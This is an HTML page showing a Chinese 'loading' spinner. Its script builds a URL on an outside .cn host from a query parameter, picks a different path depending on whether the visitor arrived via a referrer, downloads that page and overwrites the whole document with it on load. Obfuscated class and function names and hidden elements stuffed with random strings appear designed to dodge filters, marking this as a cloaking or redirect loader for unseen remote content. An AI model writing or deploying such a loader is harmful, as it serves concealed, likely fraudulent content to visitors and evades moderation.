<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .lPbhgByun {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .lPbhgByun .QmkjEF {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .lPbhgByun .content {
            line-height: 50px;
            text-align: center
        }

        .lPbhgByun .img {
            width: 100%
        }

        .lPbhgByun .Gthgi4f {
            text-align: center
        }

        .lPbhgByun .Gthgi4f span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .lPbhgByun .Gthgi4f span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .lPbhgByun .Gthgi4f span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .lPbhgByun .Gthgi4f span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .lPbhgByun .Gthgi4f span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .lPbhgByun .Gthgi4f span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .lPbhgByun .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function BB7Pj9R6GbB(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Tw8Qsu = BB7Pj9R6GbB('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Tw8Qsu +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Tw8Qsu +".html?a=share";
		}
		
        NxNZyu=url+"#"+new Date().getTime();
        NxNZyu && function() {
            $.get(NxNZyu, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Pn12ztl0qncCzFq8mxy9zndNOoJEEaHkqv6ky8qXbOimnsv4l5LXfHLa5UKQwxNhV3a7GUWwdgiT7MGkfGa6Zu8y8WgVK</b>
<li style='display:none' >cDs4Z2ne23IMmcUVbGj3lWKiknGmnx3G37qGZbVM6F1839Ln7vdKPDNjAbe60x</li>
<img  src='' style='display:none'>
<li style='display:none' >cDs4Z2ne23IMmcUVbGj3lWKiknGmnx3G37qGZbVM6F1839Ln7vdKPDNjAbe60x</li>
<a  href='#' style='display:none'>ocspY13gbdtjqq46k6pGryQXGR5lALWOHnwDfhBoU</a><div class="lPbhgByun">
    <div class="QmkjEF">
        <div class="Gthgi4f">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >LPyLe3EUPdLuINscVs1nB24OrldIUfGzGlSLsPgj2Y9bo3RzcGxEs</b>
<h1 style='display:none' >CAFBGeLIRhQ3EQZy4kXXRa</h1>
<img  src='' style='display:none'>
<h1 style='display:none' >CAFBGeLIRhQ3EQZy4kXXRa</h1>
<span style='display:none'>w0MvU0lqakWZHmicDWf3YLk6f88LU5ncqJXmis</span>
<b style='display:none' >LPyLe3EUPdLuINscVs1nB24OrldIUfGzGlSLsPgj2Y9bo3RzcGxEs</b>
<div style='display:none'>GjtJamYHufhZFexve3MDWI83nkabiXEDlCWylaiueSGxuPS5KwkISydAeLltWWF</div>
<div style='display:none'>GjtJamYHufhZFexve3MDWI83nkabiXEDlCWylaiueSGxuPS5KwkISydAeLltWWF</div>
<ul style='display:none' >ftnaF0Pi1bIM5XjTtBiykN3miKbWtipKGhv5OggbikQGS2bDiNLvdxHOx1BioPdkIlRqbNGxFfQB5Stg4XfZjHP0FNiKJP136F</ul></body>
</html>